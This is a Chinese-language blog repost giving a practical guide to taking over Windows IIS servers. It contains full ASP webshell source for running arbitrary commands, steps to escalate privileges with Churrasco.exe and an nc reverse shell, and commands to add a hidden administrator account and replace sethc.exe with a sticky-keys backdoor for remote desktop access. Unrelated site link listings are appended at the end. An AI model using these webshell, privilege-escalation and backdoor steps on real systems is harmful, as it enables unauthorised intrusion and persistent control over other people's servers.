提权工具如下:cmd.exe Churrasco.exe nc.exe

提权前提:Wscript组件成功开启

如果Wscript组件被关闭,则使用以下方法开启:

源代码:

<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<%if err then%>

<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<%

end if %>

<form method="post">

<input type=text name="cmdx" size=60 value="C:\RECYCLER\cmd.exe"><br>

<input type=text name="cmd" size=60><br>

<input type=submit value="net user"></form>

<textarea readonly cols=80 rows=20>

<%On Error Resume Next

if request("cmdx")="C:\RECYCLER\cmd.exe" then

response.write oScriptlhn.exec("cmd.exe /c"&request("cmd")).stdout.readall

end if

response.write oScriptlhn.exec(request("cmdx")&" /c"&request("cmd")).stdout.readall

%>

</textarea>

将源代码保存为1.asp并上传到webshell里,IE访问1.asp,如没有出错等就说明可以执行CMD命令!

下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/-->Current User: NETWORK SERVICE

/churrasco/-->Getting Rpcss PID ...

/churrasco/-->Found Rpcss PID: 696

/churrasco/-->Searching for Rpcss threads ...

/churrasco/-->Found Thread: 444

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 700

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 704

/churrasco/-->Thread not impersonating, looking for another thread...

/churrasco/-->Found Thread: 712

/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0xf24

/churrasco/-->Getting SYSTEM token from Rpcss Service...

/churrasco/-->Found szywjs Token

/churrasco/-->Found SYSTEM token 0xf1c

/churrasco/-->Running command with SYSTEM Token...

直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!

在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe "net user iisuser iisuser /add”
  C:\RECYCLER\Churrasco.exe "net localgroup administrators iisuser /add"
  C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!
  如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!
  如下 依次执行:
  attrib c:\windows\system32\sethc.exe -h -r -s
  attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
  del c:\windows\system32\sethc.exe
  copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
  copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
  attrib c:\windows\system32\sethc.exe +h +r +s
  attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
  如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自    用这方法成功替换过别人带有密码的SHIFT后门!
  还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!
  C:\RECYCLER\Churrasco.exe "copy d:\windows\explorer.exe d:\windows\system32\sethc.exe"
  C:\RECYCLER\Churrasco.exe "copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe "
  还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!
  这样就可以利用SHIft后门成功拿下服务器了。

转载于:https://www.cnblogs.com/milantgh/p/3593781.html

SHIFT后门拿服务器之方法总结相关推荐

  1. 后门之shift后门制作及修复方法

    一.如何制作shift后门 方法1 在cmd窗口,敲打命令如下: copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\ ...

  2. 《老漏洞复现与分析篇》 - 其一 - shift后门

    引言 因为本菜鸡的博客没什么文章素材,所以想开一个新文章类别,本来想整一个漏洞分析和复现的,无奈由于实力不允许,只能再前面加一个"老"字,整一点多年前的老漏洞拿来复现和分析.俗话说 ...

  3. 重装xshell的系统_xshell恢复默认设置 如何还原系统 - Linux - 服务器之家

    xshell恢复默认设置 如何还原系统 发布时间:2017-05-24 来源:服务器之家 电脑在使用过程中可能会遇到各种各样的问题,当我们询问这些问题的解决办法时候相信得到的答案很多都是还原系统,其实 ...

  4. linux搭建python运行环境_centos运行.py centos5.5下搭建python开发运行环境 - Linux - 服务器之家...

    centos运行.py centos5.5下搭建python开发运行环境 发布时间:2017-04-28 来源:服务器之家 我们知道ython可以在windows.linux.android运行了,但 ...

  5. angular 关闭当前页_angular刷新当前页 angularjs页面不刷新的解决办法 - 电脑常识 - 服务器之家...

    angular刷新当前页 angularjs页面不刷新的解决办法 发布时间:2017-03-19 来源:服务器之家 刚用angularjs时,确实被它的双向数据绑定震住了,但同时没有完合使用angul ...

  6. python卸载错误_卸载python后导致yum无法使用的解决办法 - Python - 服务器之家

    卸载python后导致yum无法使用的解决办法 发布时间:2014-08-03 来源:服务器之家 由于服务器需要升级python,参照了一篇坑爹的文章卸载了旧版python # 卸载旧的python ...

  7. Linux搭建泰拉瑞亚(原版/模组/插件)服务器之1.3模组服务器

    文章目录 前言 1.准备服务器/配置swap 2.将tml1.3开服需要的文件上传/下载到服务器 3.启动tml1.3服务器 4.后台运行tmodloader 1.3 前言 本教程适用于在Linux上 ...

  8. 苹果6plus一直没信号服务器,苹果6sPlus信号弱或者无服务解决方法

    苹果6sPlus信号弱或者无服务解决方法.每次出去玩的时候,朋友的手机信号满满的,自己的却信号弱甚至无服务,这可愁死我们了,该怎么办呢,下面就让手机世界小编来教你们苹果6sPlus信号弱或者无服务解决 ...

  9. 6s信号时有有时无服务器,苹果iPhone6s信号弱或无服务解决方法

    苹果iPhone6s信号弱或无服务解决方法.网友们有没有遇到跟小编这样的情况,在同一个地方,别人的iPhone信号满满,自己的手机却时常无服务或者信号很弱,这是为什么呢,其实iPhone手机信号不好的 ...

最新文章

  1. FlatBuffers初探
  2. Hyper-V 性能加速之VMQ
  3. javascript函数上的prototype属性的理解
  4. python开发环境功能介绍_第一模块 第3章 Python介绍与环境配置
  5. java get set 注解_java技能提升,用Lombok甩掉get和set,让代码变得更简洁
  6. ZendFramework-2.4 源代码 - 整体架构(类图)
  7. 系统辨识(一):相关概念
  8. 苹果屏保壁纸_抖音超火的时间轮盘屏保,安卓苹果都可以用。
  9. ie 无人操作自动关闭_Win10系统下ie浏览器无响应白屏自动关闭如何修复
  10. python实现拼多多自动回复_拼多多客服多开工具怎么配置多店铺客服?
  11. 东北大学OJ-1216: 实验2-6 :计算圆椎体体积
  12. GitHub 配置SSH Key
  13. 偏微分方程matlab课件,MATLAB偏微分方程求解.ppt
  14. 十月,你好。余杭,巴比特来了!
  15. 手机损坏的视频怎么修复
  16. 【2019-游记】中山纪念中学暑期游Day4
  17. 开源代码基于深度学习的超分辨率如何让大脑显微镜成像去除毛刺
  18. 【VUE】学习记录一
  19. 如何利用黄金分割法计算股票中压力位和支撑位
  20. 微擎框架之$_W全局变量

热门文章

  1. Python代码规范(PEP8)问题及解决
  2. Java EE重命名为Jakarta EE:Java EE Guardians与Oracle的分歧
  3. swift开发的小坑
  4. asp.net中日志框架Log4Net的使用
  5. Android新建一个activty
  6. 便携式办公套件LibreOffice Portable 4.0.1
  7. linux-gcc 编译时头文件和库文件搜索路径
  8. Zabbix(七)zabbix proxy 分布式监控配置
  9. anaconda python no module named ‘past‘的解决方法
  10. 机构借贷平台 Maple 将上线以太坊主网并开启流动性挖矿